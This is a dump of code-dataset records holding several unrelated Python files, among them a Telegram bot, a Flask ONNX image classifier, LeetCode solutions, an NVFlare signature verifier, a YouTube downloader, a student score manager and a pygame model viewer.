update.effective_message.chat_id\n if chat_id not in WHITELIST_CHATS:\n context.bot.send_message(\n chat_id=update.message.chat_id, text=\"Unallowed chat! Leaving...\"\n )\n try:\n context.bot.leave_chat(chat_id)\n finally:\n raise DispatcherHandlerStop\n if len(BL_CHATS) != 0:\n chat_id = update.effective_message.chat_id\n if chat_id in BL_CHATS:\n context.bot.send_message(\n chat_id=update.message.chat_id, text=\"Unallowed chat! Leaving...\"\n )\n try:\n context.bot.leave_chat(chat_id)\n finally:\n raise DispatcherHandlerStop\n if len(WHITELIST_CHATS) != 0 and len(BL_CHATS) != 0:\n chat_id = update.effective_message.chat_id\n if chat_id in BL_CHATS:\n context.bot.send_message(\n chat_id=update.message.chat_id, text=\"Unallowed chat, leaving\"\n )\n try:\n context.bot.leave_chat(chat_id)\n finally:\n raise DispatcherHandlerStop\n else:\n pass\n\n\ndef donate(update: Update, context: CallbackContext):\n update.effective_message.from_user\n chat = update.effective_chat # type: Optional[Chat]\n context.bot\n if chat.type == \"private\":\n update.effective_message.reply_text(\n DONATE_STRING, parse_mode=ParseMode.MARKDOWN, disable_web_page_preview=True\n )\n update.effective_message.reply_text(\n \"You can also donate to the person currently running me \"\n \"[here]({})\".format(DONATION_LINK),\n parse_mode=ParseMode.MARKDOWN,\n )\n\n else:\n pass\n\n\ndef main():\n\n if SUPPORT_CHAT is not None and isinstance(SUPPORT_CHAT, str):\n try:\n dispatcher.bot.sendMessage(f\"@IdzeroidSupport\", \"⚡️\")\n except Unauthorized:\n LOGGER.warning(\n \"Bot isnt able to send message to support_chat, go and check!\"\n )\n except BadRequest as e:\n LOGGER.warning(e.message)\n\n test_handler = CommandHandler(\"test\", test, run_async=True)\n start_handler = CommandHandler(\"start\", start, pass_args=True, run_async=True)\n\n help_handler = CommandHandler(\"help\", get_help, run_async=True)\n help_callback_handler = CallbackQueryHandler(\n help_button, pattern=r\"help_\", run_async=True\n )\n\n settings_handler = CommandHandler(\"settings\", get_settings)\n settings_callback_handler = CallbackQueryHandler(\n settings_button, pattern=r\"stngs_\", run_async=True\n )\n\n about_callback_handler = CallbackQueryHandler(\n aries_about_callback, pattern=r\"aboutmanu_\", run_async=True\n )\n\n donate_handler = CommandHandler(\"donate\", donate, run_async=True)\n\n migrate_handler = MessageHandler(\n Filters.status_update.migrate, migrate_chats, run_async=True\n )\n is_chat_allowed_handler = MessageHandler(\n Filters.chat_type.groups, is_chat_allowed, run_async=True\n )\n\n # dispatcher.add_handler(test_handler)\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(about_callback_handler)\n dispatcher.add_handler(help_handler)\n dispatcher.add_handler(settings_handler)\n dispatcher.add_handler(help_callback_handler)\n dispatcher.add_handler(settings_callback_handler)\n dispatcher.add_handler(migrate_handler)\n dispatcher.add_handler(is_chat_allowed_handler)\n dispatcher.add_handler(donate_handler)\n\n dispatcher.add_error_handler(error_callback)\n\n if WEBHOOK:\n LOGGER.info(\"Using webhooks.\")\n updater.start_webhook(listen=\"0.0.0.0\", port=PORT, url_path=TOKEN)\n\n if CERT_PATH:\n updater.bot.set_webhook(url=URL + TOKEN, certificate=open(CERT_PATH, \"rb\"))\n else:\n updater.bot.set_webhook(url=URL + TOKEN)\n client.run_until_disconnected()\n\n else:\n LOGGER.info(\"Arie using long polling.\")\n updater.start_polling(\n timeout=15,\n read_latency=4,\n drop_pending_updates=True,\n allowed_updates=Update.ALL_TYPES,\n )\n\n if len(argv) not in (1, 3, 4):\n telethn.disconnect()\n else:\n telethn.run_until_disconnected()\n\n updater.idle()\n\n\ntry:\n ubot.start()\nexcept BaseException:\n print(\"Userbot Error! Have you added a STRING_SESSION in deploying??\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n LOGGER.info(\"Successfully loaded modules: \" + str(ALL_MODULES))\n telethn.start(bot_token=TOKEN)\n pbot.start()\n main()\n","repo_name":"Aryza23/SaintAries","sub_path":"aries/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":39958,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"8894141769","text":"import cgi\nfrom zope import interface, schema, component\nfrom zope.location import Location\nfrom zope.component import getUtility, getMultiAdapter, queryMultiAdapter\nfrom zope.session.interfaces import ISession\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.traversing.browser import absoluteURL\nfrom zope.dublincore.interfaces import IDCTimes\n\nfrom zojax.layoutform import Fields, PageletEditForm\nfrom zojax.wizard.interfaces import ISaveable\nfrom zojax.wizard.step import WizardStepForm\nfrom zojax.catalog.interfaces import ICatalog\nfrom zojax.batching.session import SessionBatch\nfrom zojax.ownership.interfaces import IOwnership\nfrom zojax.content.type.interfaces import IItem, IContentViewView, IContentType\nfrom zojax.content.table.title import TitleColumn\nfrom zojax.content.table.interfaces import IContentsTable\nfrom zojax.table.table import Table\nfrom zojax.table.column import Column\nfrom zojax.pageelement.interfaces import IPageElement\nfrom zojax.principal.profile.interfaces import IPersonalProfile\n\nfrom zojax.seo.interfaces import _, ISEO, IHTMLTags\n\nSESSIONKEY = u'zojax.seo'\n\n\nclass ISearchForm(interface.Interface):\n\n searchableText = schema.TextLine(\n title = u'Searchable text',\n required = False)\n\n type = schema.List(\n title = u'Content type',\n value_type = schema.Choice(\n vocabulary='zojax.content.portalContent'),\n required = False)\n\n\nclass PortalContent(WizardStepForm):\n interface.implements(ISaveable)\n\n fields = Fields(ISearchForm)\n\n def __init__(self, context, *args):\n super(PortalContent, self).__init__(context, *args)\n\n self.ids = getUtility(IIntIds)\n\n def applyChanges(self, data):\n session = ISession(self.request)\n session[SESSIONKEY]['params'] = data\n return True\n\n def getContent(self):\n session = ISession(self.request)\n return session[SESSIONKEY].get('params', {})\n\n\nclass PortalContentsTable(Table):\n interface.implements(IContentsTable)\n component.adapts(ISEO, interface.Interface, interface.Interface)\n\n pageSize = 30\n sessionBatch = True\n enabledColumns = ('title', 'titletag', 'author',\n 'type', 'location', 'created')\n msgEmptyTable = _('No content.')\n\n def initDataset(self):\n catalog = getUtility(ICatalog)\n\n session = ISession(self.request)\n data = session[SESSIONKEY].get('params', {})\n\n query = {\n 'isDraft': {'any_of': (False,)},\n 'typeType': {'any_of': ('Portal type',)},\n 'sort_on': 'title',\n 'noPublishing': True, 'noSecurityChecks': True,\n }\n\n if 'type' in data and data['type']:\n query['type'] = {'any_of': data['type']}\n\n if 'searchableText' in data and data['searchableText']:\n query['searchableText'] = data['searchableText']\n\n try:\n self.dataset = catalog.searchResults(**query)\n except:\n self.dataset = ()\n\n\nclass TitleColumn(TitleColumn):\n component.adapts(ISEO, interface.Interface, PortalContentsTable)\n\n def update(self):\n self.ids = getUtility(IIntIds)\n self.contexturl = u'%s/index.html/content'%absoluteURL(\n self.context, self.request)\n\n def contentUrl(self):\n return u'%s/view.html?id=%s'%(\n self.contexturl, self.ids.getId(self.content))\n\n\nclass TitleTagColumn(Column):\n component.adapts(ISEO, interface.Interface, PortalContentsTable)\n\n title = _('HTML title tag')\n\n def query(self, default=None):\n pageelement = getMultiAdapter(\n (self.content, self.request, None), IPageElement, u'page.title')\n return pageelement.updateAndRender()\n\n def render(self):\n return cgi.escape(self.query().strip()[7:-8])\n\n\nclass ContentView(PageletEditForm):\n\n fields = Fields(IHTMLTags)\n\n title = u''\n description = u''\n\n def update(self):\n try:\n content = getUtility(IIntIds).getObject(\n int(self.request.get('id')))\n except:\n self.redirect('./')\n return\n\n self.content = content\n\n item = IItem(content, None)\n if item is not None:\n self.title = item.title\n self.description = item.description\n\n dctimes = IDCTimes(content)\n self.created = dctimes.created\n self.modified = dctimes.modified\n\n pagetitle = getMultiAdapter(\n (content, self.request, None), IPageElement, u'page.title')\n self.pagetitle = cgi.escape(pagetitle.updateAndRender().strip()[7:-8])\n\n super(ContentView, self).update()\n\n def getContent(self):\n return self.content\n\n def getLocation(self):\n request = self.request\n content = self.content.__parent__\n\n item = IItem(content, None)\n\n title = u''\n description = u''\n if item is not None:\n title = item.title\n description = item.description\n\n view = queryMultiAdapter((content, request), IContentViewView)\n if view is not None:\n url = '%s/%s'%(absoluteURL(content, request), view.name)\n else:\n url = '%s/'%absoluteURL(content, request)\n\n return {'url': url,\n 'title': title or _('[No title]'),\n 'content': content,\n 'icon': queryMultiAdapter((content, request), name='zmi_icon'),\n 'description': description or u''}\n\n def getAuthor(self):\n ownership = IOwnership(self.content, None)\n if ownership is not None:\n principal = ownership.owner\n else:\n principal = None\n\n if principal is not None:\n request = self.request\n profile = IPersonalProfile(principal)\n\n info = {'title': profile.title,\n 'profile': ''}\n\n space = profile.space\n if space is not None:\n info['profile'] = '%s/'%absoluteURL(space, request)\n\n return info\n\n def getContentType(self):\n ct = IContentType(self.content)\n\n return {'title': ct.title,\n 'icon': queryMultiAdapter(\n (self.content, self.request), name='zmi_icon')}\n","repo_name":"Zojax/zojax.seo","sub_path":"src/zojax/seo/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"17536347958","text":"from flask import Flask, render_template, request\nimport onnxruntime as ort\nfrom PIL import Image\nfrom torchvision import transforms\nimport os\nimport torch\n\napp = Flask(__name__)\n\n# Path to the ONNX model file\nmodel_path = 'mobilenet_v2.onnx'\n\n# Create an ONNXRuntime inference session\nort_session = ort.InferenceSession(model_path)\n\ndef preprocess_image(image_path):\n \"\"\"\n Preprocesses the image before feeding it into the model.\n \"\"\"\n image = Image.open(image_path)\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )\n ])\n image = transform(image).unsqueeze(0)\n return image\n\ndef predict(image_path):\n \"\"\"\n Performs image classification using the pre-trained MobileNetV2 model.\n \"\"\"\n try:\n # Preprocess the image\n image = preprocess_image(image_path)\n \n # Get the input and output names of the ONNX model\n input_name = ort_session.get_inputs()[0].name\n output_name = ort_session.get_outputs()[0].name\n \n with torch.no_grad():\n # Run the inference using the ONNXRuntime session\n output = ort_session.run([output_name], {input_name: image.numpy()})[0]\n \n # Convert the output to a torch tensor\n predicted = torch.from_numpy(output)\n \n # Perform post-processing to get the predicted class\n _, predicted = torch.max(predicted, 1)\n class_index = predicted.cpu().numpy()[0]\n \n # Load the class labels\n with open('imagenet_classes.txt') as f:\n classes = [line.strip() for line in f.readlines()]\n \n # Get the predicted class label\n prediction = classes[class_index]\n prediction = prediction.split(\",\")[1].strip().capitalize()\n \n return prediction\n except Exception as e:\n # Handle any exceptions that occur during prediction\n error_msg = \"Error: Failed to preprocess or classify the image. Please ensure the image is in a supported format and try again.\"\n print(f\"{error_msg}\\n{e}\")\n return error_msg\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n \"\"\"\n Handles the index route and performs image classification.\n \"\"\"\n prediction = None\n uploaded_image = None\n \n if request.method == 'POST':\n # Retrieve the uploaded file from the request\n file = request.files['file']\n filename = file.filename\n \n # Save the uploaded file\n file_path = os.path.join('static', filename)\n file.save(file_path)\n \n uploaded_image = file_path\n \n # Perform prediction on the uploaded image\n prediction = predict(file_path)\n \n if request.args.get('clear') == 'True':\n # Clear the uploaded image and prediction\n uploaded_image = None\n prediction = None\n \n return render_template('index.html', prediction=prediction, image=uploaded_image)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"schmij03/onnxsw5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24120359673","text":"# https://leetcode.com/problems/regular-expression-matching/submissions/\n\nclass Solution:\n def isMatch(self, s: str, p: str) -> bool:\n memo = {}\n \n def dp(i,j):\n \n if (i,j) in memo:\n return memo[(i,j)]\n \n \n if j == len(p):\n flag = i==len(s)\n memo[(i,j)] = flag\n return flag\n \n first_match = i < len(s) and (p[j] =='.' or p[j] == s[i])\n \n if j < len(p)-1 and p[j+1] =='*':\n dp_ans = dp(i,j+2) or (first_match and dp(i+1,j))\n else:\n dp_ans = (first_match and dp(i+1,j+1))\n \n memo[(i,j)] = dp_ans \n return memo[(i,j)]\n \n return dp(0,0)","repo_name":"munagekar/cp","sub_path":"leetcode/regular_expresion_matching.py","file_name":"regular_expresion_matching.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40439607823","text":"import json\nimport os\nfrom base64 import b64decode\nfrom enum import Enum\n\nfrom cryptography import x509\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n\n\nclass LoadResult(Enum):\n \"\"\"Constants for different results when loading secure content.\"\"\"\n\n OK = \"ok\"\n NOT_MANAGED = \"notManaged\"\n NO_SUCH_CONTENT = \"noSuchContent\"\n NOT_SIGNED = \"notSigned\"\n INVALID_SIGNATURE = \"invalidSignature\"\n INVALID_CONTENT = \"invalidContent\"\n\n\nclass SecurityContentManager(object):\n def __init__(self, content_folder, signature_filename=\"signature.json\", root_cert=\"rootCA.pem\"):\n \"\"\"Content manager used by SecurityContentService to load secure content.\n\n Args:\n content_folder (str): the folder path that includes signature file\n signature_filename (str, optional): the signature file (signed dictionary). Defaults to \"signature.json\".\n root_cert (str, optional): root CA certificate filename. Defaults to \"rootCA.pem\".\n \"\"\"\n self.content_folder = content_folder\n signature_path = os.path.join(self.content_folder, signature_filename)\n rootCA_cert_path = os.path.join(self.content_folder, root_cert)\n if os.path.exists(signature_path) and os.path.exists(rootCA_cert_path):\n self.signature = json.load(open(signature_path, \"rt\"))\n for k in self.signature:\n self.signature[k] = b64decode(self.signature[k].encode(\"utf-8\"))\n cert = x509.load_pem_x509_certificate(open(rootCA_cert_path, \"rb\").read(), default_backend())\n self.public_key = cert.public_key()\n self.valid_config = True\n else:\n self.signature = dict()\n self.valid_config = False\n\n def load_content(self, file_under_verification):\n \"\"\"Loads the data of the file under verification and verifies that the signature is valid.\n\n Args:\n file_under_verification: file to load and verify\n\n Returns:\n A tuple of the file data and the LoadResult. File data may be None if the data cannot be loaded.\n \"\"\"\n full_path = os.path.join(self.content_folder, file_under_verification)\n data = None\n if not os.path.exists(full_path):\n return data, LoadResult.NO_SUCH_CONTENT\n\n with open(full_path, \"rb\") as f:\n data = f.read()\n if not data:\n return data, LoadResult.NO_SUCH_CONTENT\n\n if self.valid_config and file_under_verification in self.signature:\n signature = self.signature[file_under_verification]\n try:\n self.public_key.verify(\n signature=signature,\n data=data,\n padding=padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),\n algorithm=hashes.SHA256(),\n )\n result = LoadResult.OK\n except InvalidSignature:\n result = LoadResult.INVALID_SIGNATURE\n else:\n result = LoadResult.NOT_SIGNED\n return data, result\n\n\nclass SecurityContentService(object):\n \"\"\"Uses SecurityContentManager to load secure content.\"\"\"\n\n security_content_manager = None\n\n @staticmethod\n def initialize(content_folder: str, signature_filename=\"signature.json\", root_cert=\"rootCA.pem\"):\n if SecurityContentService.security_content_manager is None:\n SecurityContentService.security_content_manager = SecurityContentManager(\n content_folder, signature_filename, root_cert\n )\n\n @staticmethod\n def load_content(file_under_verification):\n if not SecurityContentService.security_content_manager:\n return None, LoadResult.NOT_MANAGED\n\n return SecurityContentService.security_content_manager.load_content(file_under_verification)\n\n @staticmethod\n def load_json(file_under_verification):\n if not SecurityContentService.security_content_manager:\n return None, LoadResult.NOT_MANAGED\n\n json_data = None\n\n data_bytes, result = SecurityContentService.security_content_manager.load_content(file_under_verification)\n\n if data_bytes:\n try:\n data_text = data_bytes.decode(\"ascii\")\n json_data = json.loads(data_text)\n except json.JSONDecodeError:\n return None, LoadResult.INVALID_CONTENT\n\n return json_data, result\n","repo_name":"NVIDIA/NVFlare","sub_path":"nvflare/fuel/sec/security_content_service.py","file_name":"security_content_service.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"47"} +{"seq_id":"377069293","text":"# sub(pattern, repl, string, count=0, flags=0)\t用指定的字符串替换原字符串中与正则表达式匹配的模式可以用count指定替换的次数\n\nimport re\n\n\ndef main():\n sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.'\n purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔',\n '*',\n sentence,\n flags=re.IGNORECASE)\n print(purified) # 你丫是*吗? 我*你大爷的. * you.\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kxl666/kxl-Python","sub_path":"2.Python高阶/01.爬虫/1.基本库的使用/正则表达式/替换字符串中的不良内容.py","file_name":"替换字符串中的不良内容.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17479876635","text":"#\n# @lc app=leetcode.cn id=215 lang=python3\n#\n# [215] 数组中的第K个最大元素\n#\n\n# @lc code=start\n\n\nclass Solution:\n # def findKthLargest(self, nums: List[int], k: int) -> int:\n # # 利用最小堆实现\n # # 时间复杂度: O(N logk)。\n # # 空间复杂度: O(k),用于存储堆元素\n # import heapq\n # heap = nums[:k]\n # heapq.heapify(heap)\n # for i in nums[k:]:\n # if i > heap[0]:\n # heapq.heapreplace(heap, i)\n # return heap[0]\n\n def findKthLargest(self, nums: List[int], k: int) -> int:\n # 利用快排思想实现\n # 时间复杂度: O(N)。\n # 空间复杂度: O(1),原地排序\n def partition(left, right):\n '''切分'''\n pivot = nums[left]\n while left < right:\n while left < right and nums[right] >= pivot:\n right -= 1\n nums[left] = nums[right]\n while left < right and nums[left] <= pivot:\n left += 1\n nums[right] = nums[left]\n nums[left] = pivot\n return left\n\n n = len(nums)\n target = n - k\n left = 0\n right = n - 1\n while True:\n base = partition(left, right)\n if base == target:\n return nums[base]\n elif target > base:\n left = base + 1\n else:\n righ = base-1\n\n\n# @lc code=end\n","repo_name":"psychopurp/LeetCodeDaily","sub_path":"数组/215.数组中的第k个最大元素.py","file_name":"215.数组中的第k个最大元素.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23201409802","text":"from os import path\nimport os\n\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom moviepy import *\nfrom moviepy.editor import VideoFileClip\nfrom pytube import YouTube\n\n\nimport shutil\n\n\n#functions\ndef select_path():\n #allows user to select path from the explorer\n path = filedialog.askdirectory()\n path_label.config(text=path)\n\ndef download_video():\n #get user path\n get_link = link_field.get()\n #get selected path\n user_path = path_label.cget(\"text\")\n screen.title(\"Downloading Youtube Video...\")\n #download video\n mp4_video = YouTube(get_link).streams.get_highest_resolution().download()\n vid_clip = VideoFileClip(mp4_video)\n vid_clip.close()\n #move video to selected directory\n shutil.move(mp4_video, user_path)\n screen.title(\"Download Complete! Let's Download Another Video or Audio...\")\n\ndef download_audio():\n #get user path\n get_link = link_field.get()\n #get selected path\n user_path = path_label.cget(\"text\")\n screen.title(\"Downloading Youtube Audio...\")\n #download audio\n mp3_audio = YouTube(get_link).streams.filter(only_audio = True).first()\n audio_file = mp3_audio.download()\n\n #rename mp3 from video title\n base, ext = os.path.splitext(audio_file)\n new_file = base + \".mp3\"\n os.rename(audio_file, new_file)\n\n #move audio to selected directory\n shutil.move(new_file, user_path)\n screen.title(\"Download Complete! Let's Download Another Audio or Video...\")\n\nscreen = Tk()\ntitle = screen.title('Youtube Audio & Video Downloader')\ncanvas = Canvas(screen, width=500, height=500)\ncanvas.pack()\n\n#image logo\nlogo_img = PhotoImage(file='yt.png')\n#resize image\nlogo_img = logo_img.subsample(14, 14)\n\ncanvas.create_image(250, 80, image=logo_img)\n\n#link field\nlink_field = Entry(screen, width=50)\nlink_label = Label(screen, text=\"Enter Youtube Video Link\", font=(\"Arial\", 13))\n\n#add widgets to window\ncanvas.create_window(250, 180, window=link_label)\ncanvas.create_window(250, 220, window=link_field)\n\n#select path to place file\npath_label = Label(screen, text=\"Select Path For File\", font=(\"Arial\", 13))\nselect_btn = Button(screen, text=\"Select\", command=select_path)\n\n#add to window\ncanvas.create_window(250, 280, window=path_label)\ncanvas.create_window(250, 320, window=select_btn)\n\n#download video button\ndownload_mp4_btn = Button(screen, text=\"Download Video (mp4)\", command= download_video)\n#add mp4 dwndld btn to canvas\ncanvas.create_window(250, 380, window=download_mp4_btn)\n\n#download audio button\ndownload_mp3_btn = Button(screen, text=\"Download Audio (mp3)\", command= download_audio)\n#add mp3 dwndld btn to canvas\ncanvas.create_window(250, 420, window=download_mp3_btn)\n\nscreen.mainloop()\n\n","repo_name":"luthfibg/py_audio_video_downloader","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39508450728","text":"#!/Users/maxiaoyu/Desktop/python/evns /py3/bin/python3\n#encoding:utf-8\n'''\n@File : 6.py\n@Time : 2020/05/14 23:16:13\n@Author : DesignerA \n@Version : 1.0\n@Contact : DesignerA@qq.com\n@WebSite : www.cnblogs.com/DesignerA\n'''\n# Start typing your code from here\n#用面向对象,实现一个学生Python成绩管理系统;\n#学生的信息存储在文件中;学生信息的字段有(班级,学号,姓名, Python成绩)\n#实现对学生信息及成绩的增,删,改,查方法;\n\nclass student:\n def __init__(self,class1='',num=' ',name=' ',score=0):\n self.class1=class1\n self.num=num\n self.name=name\n self.score=score\n def add(self):\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt','a') as f:\n f.write('\\n'+self.class1+' '+self.num+' '+self.name+' '+self.score+'\\n')\n def delete(self,num):\n data=[]\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt')as f:\n for line in f.readlines():\n if(line.split(' ')[1]==num):\n continue\n else:\n data.append(line)\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt','w')as f:\n for i in data:\n f.write(i)\n\n def search(self,num):\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt')as f:\n for line in f.readlines():\n if(line.split(' ')[1]==num):\n print('学生信息为:',line)\n break\n else:\n print('学号不存在')\n print(' ')\n\n\ndef scoresystem():\n while(True):\n print('欢迎来到学生成绩管理系统')\n print('1.添加学生成绩信息')\n print('2.删除学生成绩信息')\n print('3.修改学生信息')\n print('4.查询学生信息')\n choice=int(input('请输入想要进行的操作:'))\n if(choice==1):\n class1=input('请输入学生班级:')\n num=input('请输入学生学号:')\n name=input('请输入学生姓名:')\n score=input('请输入学生分数:')\n stu=student(class1,num,name,score)\n stu.add()\n\n elif(choice==2):\n num=input('请输入想要删除的学生学号:')\n stu=student()\n stu.delete(num)\n\n elif(choice==3):\n num=input('请输入想要修改的学生学号:')\n class1=input('请输入新的学生班级:')\n name=input('请输入新的学生姓名:')\n score=input('请输入新的学生分数:')\n stu=student(class1,num,name,score)\n stu.delete(num)\n stu.add()\n \n elif(choice==4):\n num=input('请输入学生学号进行查询:')\n stu=student()\n stu.search(num)\n\nscoresystem()\n ","repo_name":"maxiaoyu0727/python","sub_path":"pythonprojects/homework6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42355581766","text":"import pygame\nfrom math import cos, sin, acos, pi, sqrt\n\n\nclass ModelViewer:\n\t\"\"\" Displays a 3d model. \n\tUse w/s, d/a, and q/e to rotate about x, y, and z axi respectively.\n\tUse c to switch to a cube, p for a pyramid, and t for a triangular prism \"\"\"\n\tSCREEN_SIZE = (600, 600)\n\tCENTER = (300, 300)\n\tBACKGROUND_COLOR = (0, 0, 0)\n\tTEXT_COLOR = (255, 255, 255)\n\tROTATE_RATE = 0.0075\n\tCUBE_SIZE = 150\n\tTRI_PRISM_SIZE = 150\n\tTRI_PRISM_LENGTH = 150\n\tPYRAMID_SIZE = 150\n\tFONT_SIZE = 12\n\tTEXT_SPACING = 3\n\tTEXT_TOP = 5\n\tTEXT_LEFT = 5\n\tFPS = 120\n\n\tdef __init__(self):\n\t\t\"\"\" Create a new application, displaying a cube by default \"\"\"\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n\t\tpygame.display.set_caption(\"Model Viewer\")\n\t\tself.font = pygame.font.SysFont(\"Arial\", self.FONT_SIZE)\n\t\tself.clock = pygame.time.Clock()\n\t\tself.current_model = Cube(self.CUBE_SIZE)\n\t\tself.running = True\n\t\tself.loop()\n\n\tdef loop(self):\n\t\t\"\"\" Handle events and draw to screen \"\"\"\n\t\twhile self.running:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tself.running = False\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\t\tself.current_model = Cube(self.CUBE_SIZE)\n\t\t\t\t\telif event.key == pygame.K_p:\n\t\t\t\t\t\tself.current_model = Pyramid(self.PYRAMID_SIZE)\n\t\t\t\t\telif event.key == pygame.K_t:\n\t\t\t\t\t\tself.current_model = TriangularPrism(self.TRI_PRISM_SIZE, self.TRI_PRISM_LENGTH)\n\t\t\tkeys = pygame.key.get_pressed()\n\t\t\tif keys[pygame.K_d]:\n\t\t\t\tself.current_model.rotate_y(-self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_a]:\n\t\t\t\tself.current_model.rotate_y(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_w]:\n\t\t\t\tself.current_model.rotate_x(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_s]:\n\t\t\t\tself.current_model.rotate_x(-self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_q]:\n\t\t\t\tself.current_model.rotate_z(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_e]:\n\t\t\t\tself.current_model.rotate_z(-self.ROTATE_RATE)\n\n\t\t\tself.screen.fill((0, 0, 0))\n\t\t\tself.current_model.draw(self.screen, self.CENTER)\n\t\t\tself.draw_instructions()\n\t\t\tpygame.display.flip()\n\t\t\tself.clock.tick(self.FPS)\n\n\tdef draw_instructions(self):\n\t\t\"\"\" Draw instruction text to screen \"\"\"\n\t\tt1 = self.font.render(\"w/s - rotate about x-axis\", True, self.TEXT_COLOR)\n\t\tt2 = self.font.render(\"d/a - rotate about y-axis\", True, self.TEXT_COLOR)\n\t\tt3 = self.font.render(\"q/e - rotate about z-axis\", True, self.TEXT_COLOR)\n\t\tt4 = self.font.render(\"c - change to cube model\", True, self.TEXT_COLOR)\n\t\tt5 = self.font.render(\"p - change to pyramid model\", True, self.TEXT_COLOR)\n\t\tt6 = self.font.render(\"t - change to triangular prism model\", True, self.TEXT_COLOR)\n\t\tlabels = [t1, t2, t3, t4, t5, t6]\n\t\ty = self.TEXT_TOP\n\t\tfor label in labels:\n\t\t\tself.screen.blit(label, (self.TEXT_LEFT, y))\n\t\t\ty += label.get_height() + self.TEXT_SPACING\n\n\n\nclass Model:\n\t\"\"\" Holds data for a 3d model \"\"\"\n\n\tdef __init__(self, points, mesh, colors):\n\t\t\"\"\" Create a model from the given vertices and mesh of the given colors.\n\t\t\tPoints: List of tuples in the format (x, y, z)\n\t\t\tMesh: List of tuples representing triangles in the format (p1, p2, p3)\n\t\t\t\t\twhere each p is the index of a vertex \n\t\t\tColors: List of tuples in the format (r, g, b) for the corresponding triangles of the mesh \"\"\" \n\t\tself.points = points\n\t\tself.mesh = mesh\n\t\tself.colors = colors\n\n\tdef rotate_x(self, theta):\n\t\t\"\"\" Rotate about the x-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0]\n\t\t\tnew[1] = point[1] * cos(theta) - point[2] * sin(theta)\n\t\t\tnew[2] = point[1] * sin(theta) + point[2] * cos(theta)\n\t\t\tpoint[:] = new[:]\n\n\tdef rotate_y(self, theta):\n\t\t\"\"\" Rotate about the y-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0] * cos(theta) + point[2] * sin(theta)\n\t\t\tnew[1] = point[1]\n\t\t\tnew[2] = -point[0] * sin(theta) + point[2] * cos(theta)\n\t\t\tpoint[:] = new[:]\n\n\tdef rotate_z(self, theta):\n\t\t\"\"\" Rotate about the z-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0] * cos(theta) - point[1] * sin(theta)\n\t\t\tnew[1] = point[0] * sin(theta) + point[1] * cos(theta)\n\t\t\tnew[2] = point[2]\n\t\t\tpoint[:] = new[:]\n\n\tdef draw(self, screen, center):\n\t\t\"\"\" Draw model to the screen \"\"\"\n\t\ttris = []\n\t\ti = 0\n\t\tfor tri in self.mesh:\n\t\t\tv1 = [self.points[tri[1]][0] - self.points[tri[0]][0],\n\t\t\t\t\tself.points[tri[1]][1] - self.points[tri[0]][1],\n\t\t\t\t\tself.points[tri[1]][2] - self.points[tri[0]][2]]\n\t\t\tv2 = [self.points[tri[2]][0] - self.points[tri[0]][0],\n\t\t\t\t\tself.points[tri[2]][1] - self.points[tri[0]][1],\n\t\t\t\t\tself.points[tri[2]][2] - self.points[tri[0]][2]]\n\t\t\tcross = [v1[1] * v2[2] - v1[2] * 